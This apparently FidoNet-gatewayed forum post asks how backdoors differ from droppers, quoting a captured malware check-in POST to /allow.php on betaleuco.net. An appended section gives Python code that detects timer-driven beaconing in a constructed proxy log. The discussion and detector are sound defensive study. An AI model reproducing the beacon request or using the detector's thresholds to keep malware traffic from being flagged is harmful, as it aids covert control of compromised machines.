"David H. Lipman" wrote:
> As a Backdoor, it has to Beacon the compromised system and/or
> Phone Home.
Wouldn't the act of downloading a payload package be a beacon or signal
in and of itself?
What is being "beacon'd" or signaled by the following that couldn't be
done by Getting what presumably it will end up getting anyway in the
near future?
> POST /allow.php HTTP/1.1
> Cache-Control: no-cache
> Connection: close
> Pragma: no-cache
> Content-Type: application/octet-stream
> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;
> Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
> 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
> Content-Length: 42
> Host: betaleuco.net
?
Is there a difference between a backdoor and a dropper?
Am I right in thinking that these initial infectors are usually droppers, in
that the first (and perhaps only) thing they do is obtain and launch at
least one additional code file from an external server?
Whereas a backdoor has enough functionality to be persistent on the
infected system and accept incoming connections to carry out future
instructions?
If the latter, how does the backdoor ensure that it is reachable through
the gateway or NAT router through which the host is presumably connected
to the internet? (Presumably it can easily defeat any firewall running on
the host.)
--- NewsGate v1.0 gamma 2
* Origin: News Gate @ Net396 -Huntsville, AL - USA (1:396/4)
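The poster asks what the POST to /allow.php signals beyond what a later download would. One observable answer is its cadence: a phone-home is sent on a fixed timer regardless of what comes back, so from a proxy log it looks like a client hitting one host at nearly constant intervals with a fixed-size body. The following is an added example, not code from this thread or from either poster; it scores request groups by interval regularity over a constructed proxy log whose line format (timestamp, client, method, host, path, content type, content length) is an assumption made for the example.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log (not captured traffic). The line format is an
# assumption for this example:
#   "<ISO timestamp> <client ip> <method> <host> <path> <content-type> <content-length>"
# The client posts 42 bytes to betaleuco.net every ~5 minutes while browsing
# www.example.com at irregular times in between.
SAMPLE_LOG = """\
2014-03-01T10:00:00 10.0.0.5 POST betaleuco.net /allow.php application/octet-stream 42
2014-03-01T10:00:07 10.0.0.5 GET www.example.com / text/html 0
2014-03-01T10:00:09 10.0.0.5 GET www.example.com /style.css text/css 0
2014-03-01T10:05:01 10.0.0.5 POST betaleuco.net /allow.php application/octet-stream 42
2014-03-01T10:07:30 10.0.0.5 GET www.example.com /news text/html 0
2014-03-01T10:09:59 10.0.0.5 POST betaleuco.net /allow.php application/octet-stream 42
2014-03-01T10:15:00 10.0.0.5 POST betaleuco.net /allow.php application/octet-stream 42
2014-03-01T10:18:42 10.0.0.5 GET www.example.com /search?q=x text/html 0
2014-03-01T10:20:02 10.0.0.5 POST betaleuco.net /allow.php application/octet-stream 42
2014-03-01T10:25:00 10.0.0.5 POST betaleuco.net /allow.php application/octet-stream 42
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) "
    r"(?P<path>\S+) (?P<ctype>\S+) (?P<clen>\d+)$"
)


def parse_log(text):
    """Parse log lines in the assumed format into dicts; skip malformed lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        rec["clen"] = int(rec["clen"])
        records.append(rec)
    return records


def find_beacons(records, min_hits=4, max_cv=0.2):
    """Group requests by (client, host) and flag groups whose gaps between
    consecutive requests are nearly constant (coefficient of variation of the
    gaps <= max_cv). Returns {(client, host): summary} for flagged groups."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["client"], r["host"])].append(r)

    flagged = {}
    for key, reqs in groups.items():
        if len(reqs) < min_hits:
            continue
        reqs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            flagged[key] = {
                "hits": len(reqs),
                "interval_s": round(statistics.median(gaps)),
                "cv": round(cv, 3),
                # A constant request body size is a second hint of a timer-driven check-in.
                "fixed_length": len({r["clen"] for r in reqs}) == 1,
                "paths": sorted({r["path"] for r in reqs}),
            }
    return flagged


if __name__ == "__main__":
    for (client, host), info in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"{client} -> {host}: every ~{info['interval_s']}s, "
              f"{info['hits']} hits, cv={info['cv']}, fixed body={info['fixed_length']}, "
              f"paths={info['paths']}")
```

On the constructed log only the betaleuco.net group is flagged (six hits about 300 s apart, always 42 bytes); the browsing to www.example.com has four hits but wildly uneven gaps and falls below the threshold. Real check-ins often add jitter, so `max_cv` is a knob to tune against your own baseline rather than a fixed answer.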